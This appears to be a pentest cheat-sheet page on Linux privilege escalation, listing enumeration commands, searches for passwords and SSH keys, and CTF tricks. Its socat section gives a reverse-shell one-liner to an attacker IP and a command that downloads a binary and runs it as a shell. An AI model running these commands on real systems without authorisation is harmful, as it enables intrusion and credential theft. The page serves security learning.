CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • System Enumeration
  • PSPY
  • User enumeration
  • Network Enumeration
  • Password Hunting
  • Misc CTF tricks
  • Read file with nmap
  • Upgrade a reverse shell to a fully TTY interactive shell
  • Automated Tools
  • Checklist
  • Resources
  1. Linux

Privilege Escalation

System Enumeration

  • hostname will return the hostname of the target machine

  • uname -a Will print system information

  • cat /proc/version provides information about the target system processes

  • cat /etc/issue contains some information about the operating system but can be changed

  • ps see the running processes

    • ps -A View all running processes

    • ps axjf View process tree

    • ps aux The aux option will show processes for all users (a), display the user that launched the process (u), and show processes that are not attached to a terminal (x).

    • ps aux | grep root

  • env will show environmental variables

  • lscpu gives info about the architecture

  • ls -la /etc/cron.daily/ check daily cronjobs

  • cat /etc/crontab check the crontab

  • lsblk check for file system and additional drives

PSPY

  • PSPY is a tool to look for running processes

  • And then we just need to launch it ./pspy64 -pf -i 1000 The -pf flag tells the tool to print commands and file system events and -i 1000 tells it to scan profcs every 1000ms (or every second).

User enumeration

  • whoami gives username

  • ìd general overview of the user’s privilege level and group memberships

  • cat /etc/passwd list of users on the system

    • cat /etc/passwd | grep home | cut -d ":" -f 1 this should return only users (and no service accounts)

  • cat /etc/shadow hash store file

  • cat /etc/groups

  • history will show previous commands

  • sudo -l what can we run as sudo. Example

    sudo -l
    Matching Defaults entries for cerealkiller on ip-172-31-63-238:
    	env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    User cerealkiller may run the following commands on ip-172-31-63-238:
        (phantom) NOPASSWD: ALL
        (vimuser) NOPASSWD: /usr/bin/vim
        (nmapuser) NOPASSWD: /usr/bin/nmap
  • sudo -u phantom cat /home/phantom/flag.txt execute a command with another user

  • find / -path /proc -prune -o -type d -perm -o+w 2>/dev/null Find writable directories

  • find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null Find writable files

Network Enumeration

  • ifconfig information about the network interfaces of the system

  • ip add (similar to ifconfig)

  • ip route show network routes

  • arp -a or ip neigh

  • netstat gather information on existing connections

    • netstat -a shows all listening ports and established connections.

    • netstat -at or netstat -au can also be used to list TCP or UDP protocols respectively.

    • netstat -l list ports in “listening” mode. These ports are open and ready to accept incoming connections. This can be used with the “t” option to list only ports that are listening using the TCP protocol (below)

    • netstat -s list network usage statistics by protocol (below) This can also be used with the -t or -u options to limit the output to a specific protocol.

    • netstat -ltp list connections with the service name and PID information and listening ports.

    • netstat -i Shows interface statistics.

    • netstat -ano -a Display all sockets, -n Do not resolve names, -o Display timers

Password Hunting

  • grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null we can also search for "PASSWORD=" to narrow the search

  • We can also hunt down SSH keys find / -name authorized_keys 2> /dev/null or find / -name id_rsa 2> /dev/null

Misc CTF tricks

Read file with nmap

  • Being creative with nmap if we do not have rights to read a specific file

    sudo -u nmapuser nmap -iL flag.txt 127.0.0.1
    Starting Nmap 7.60 ( https://nmap.org ) at 2020-06-21 02:54 UTC
    Failed to resolve "HF-B2C56B421F6229316B00A973586AAAD1".
    WARNING: No targets were specified, so 0 hosts scanned.
    Nmap done: 0 IP addresses (0 hosts up) scanned in 0.04 seconds

Upgrade a reverse shell to a fully TTY interactive shell

  • Sometimes we will get a shell but it won't be very convenient. There are some ways to upgrade your shells to interactive TTY reverse shell

  • python -c 'import pty; pty.spawn("/bin/bash")' if you want a quick dirty little fix but not completely interactive this python command works well for python3 it is the same but like this python3 -c 'import pty; pty.spawn("/bin/bash")'

  • With socat

    • socat file:tty,raw,echo=0 tcp-listen:4444 on your kali

    • socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 from the victime machine

    • wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.3.4:4444 OR wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat in your kali then put on your python3 webserver and then wget -q http://YOUR-KALI-IP/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR-KALI-IP:4444

Automated Tools

  • We can run one tool and if we do not see anything try another one

    • The color code is very useful we definitely have to investingate things in red and yellow or just in red

Checklist

Resources

PreviousUseful commands and tools for pentest on LinuxNextKernel Exploits

Last updated 2 years ago

We can get it

shows multiple ways to do so.

If socat is not installed see for static binaries

here
This article on ropnop blog
here
LinPEAS
LinEnum
Linux Exploit Suggester
Linux Priv Checker
Hacktricks
PayloadAllTheThings
Linux Privilege Escalation
Linux Privesc on TCM-Security Academy
Basic Linux Privilege Escalation - g0tmi1k
Basic Linux Privesc
GTFOBins
GTFoBins a curated list of Unix binaries
PayloadsAllTheThings/Linux - Privilege Escalation.md at master · swisskyrepo/PayloadsAllTheThingsGitHub
Linux - Privilege Escalation - Payload all the things
Checklist - Linux Privilege EscalationHackTricks
Checklist - Linux Privilege Escalation
Privilege Escalation - Linux · Total OSCP Guide
Sushant 747's Guide (Country dependant - may need VPN)
Logo
Logo
Logo
hhttps://github.com/TCM-Course-Resources/Linux-Privilege-Escalation-Resources
Linux-Privilege-Escalation-Resources
Logo
Logo
Logo